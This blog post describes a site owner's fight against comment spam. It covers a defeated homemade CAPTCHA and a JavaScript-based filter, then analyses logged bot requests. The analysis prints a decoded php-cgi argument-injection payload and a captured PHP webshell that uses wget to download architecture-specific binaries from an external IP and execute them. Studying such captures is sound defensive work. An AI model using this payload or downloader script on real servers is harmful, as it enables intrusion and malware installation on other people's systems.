Year of the spam

At Google, they say they don't need CAPTCHAs anymore. If I had an iframe on virtually every website on the web, I could probably claim the same. And if that is indeed a factor in their method, then Facebook could claim the same capability.

[Image: Google Plus and Facebook Like buttons]

A CAPTCHA (or Google's reCAPTCHA) is a system for preventing bots (automated scripts) from submitting spam to your website. They are usually found in web forms.

For example, when you add a comment on an article, you are presented with a little challenge: simple for humans, hard for bots. This ensures that automated scripts can't send you spam unless they can solve the challenge.

Spam can be one of the most annoying things on your website. It can even be harmful.

I used to have a website that accepted user comments. When it was still new, I monitored the comments and deleted spam regularly.

Once I had a few users, I stopped monitoring. I built a small image generator to protect myself from spam, and forgot about it.

Six months later, I received an alert from Google Webmaster Tools. My home-brewed CAPTCHA had been defeated. My website had become a highly potent concentration of porn, viagra, and child porn keywords.

In a panic, I blocked all new comments. I couldn't reliably filter out just the spam, so I deleted six months' worth of entries.

I modified my image generator, adding a little more complexity to fight those bots. To my surprise, it took less than a minute for it, too, to be defeated. So naturally, comments were disabled for good.


When I started this blog, I didn't think twice about comments. I went straight to a third-party system: Disqus. I'm a programmer, however, so in time I decided to reinvent the wheel with my own commenting system.

One thing that most bots don't do is run JavaScript. Simply making comment submission require JavaScript filtered out a large batch of spam bots. For those too tricky for me, I set up an easy switch to move any post back to Disqus.
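A minimal sketch of the idea (all names here are hypothetical, not the actual implementation): the page computes a token in JavaScript and the server recomputes it, so a bot that POSTs the raw form fields without ever executing script never produces a valid token.

```javascript
// Hypothetical sketch: a token only a JavaScript-running client would compute.
// A bot that submits the raw form without executing script omits it.
function buildCommentPayload(postId, text) {
  // Toy rolling hash over the post id and comment length; runs client-side.
  const token = Array.from(postId + ":" + text.length)
    .reduce((acc, ch) => (acc * 31 + ch.charCodeAt(0)) >>> 0, 7);
  return { postId, text, token };
}

function isValidPayload(payload) {
  // Server side: recompute the token and reject any mismatch.
  const expected = Array.from(payload.postId + ":" + payload.text.length)
    .reduce((acc, ch) => (acc * 31 + ch.charCodeAt(0)) >>> 0, 7);
  return payload.token === expected;
}
```

Any shared secret between page and server would do; the only point is that producing it requires actually running JavaScript, which most spam bots don't.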

Now that most, if not all, spam is blocked, it would be a shame to just let it go to waste. So since January of 2014, I have been saving every spam entry for further study. I am shocked by all the data I have gathered.

No, I don't mark any comment I disagree with as spam. I log all the POST requests that are sent to fake links I generated. So far, I have:

The URLs are simple md5 hashes generated from some of the post information. You can download them below if you want a nice little IP blacklist.

Download File

This is by no means full protection against spammers; a CAPTCHA would work better. But it is interesting to note that most bots fail a simple JavaScript test.

Some spammers, who are real people, try to sneak in some content manually. But those are easier to handle because they can only do so much.

I go through the trouble of approving each comment before it becomes permanent. And once I mark one as spam, the IP address is automatically flagged in the future.
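The flagging step can be sketched like this (a minimal in-memory version with hypothetical names; a real system would persist the list):

```javascript
// Hypothetical sketch of the moderation flow: marking a comment as spam
// adds its sender's IP to a blocklist that is checked on every new POST.
const blockedIps = new Set();

function markAsSpam(comment) {
  blockedIps.add(comment.ip);
}

function shouldRejectComment(comment) {
  return blockedIps.has(comment.ip);
}
```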

What's in the data I collected?

You can download the data in SQL format below, so I won't be talking about all the viagra and cialis here. What interested me the most is the other data that came along with it.

Download File

Here is one example:

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

After unescaping it with unescape(urlstring), this is what you get:

/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
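You can reproduce the decoding in any JavaScript console; `decodeURIComponent` is the non-deprecated replacement for `unescape`, though the `+` signs (which stand for spaces in a query string) have to be replaced by hand:

```javascript
// First few escapes of the payload above; "+" means a space in a query string.
const encoded = "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E";
const decoded = decodeURIComponent(encoded.replace(/\+/g, " "));
// decoded is "-d allow_url_include=on"
```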

There are variations of this throughout the list of requests. They target bugs in different versions of PHP, WordPress, and many other frameworks. This particular one exploits the php-cgi argument-injection bug (CVE-2012-1823): the query string is parsed as command-line flags, and `auto_prepend_file=php://input` makes PHP execute the request body as code.

Others came with more familiar data:

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://79.45.114.45:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://79.45.114.45:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://79.45.114.45:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://79.45.114.45:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://79.45.114.45:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://79.45.114.45:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://79.45.114.45:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://79.45.114.45:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>

I have only done a few tests; accessing the IP address from a browser times out. I will spend more time on it later.

This is why you have to make sure your server and applications are always up to date. These scripts roam the web, testing old bugs on random servers.


There is something to learn here.

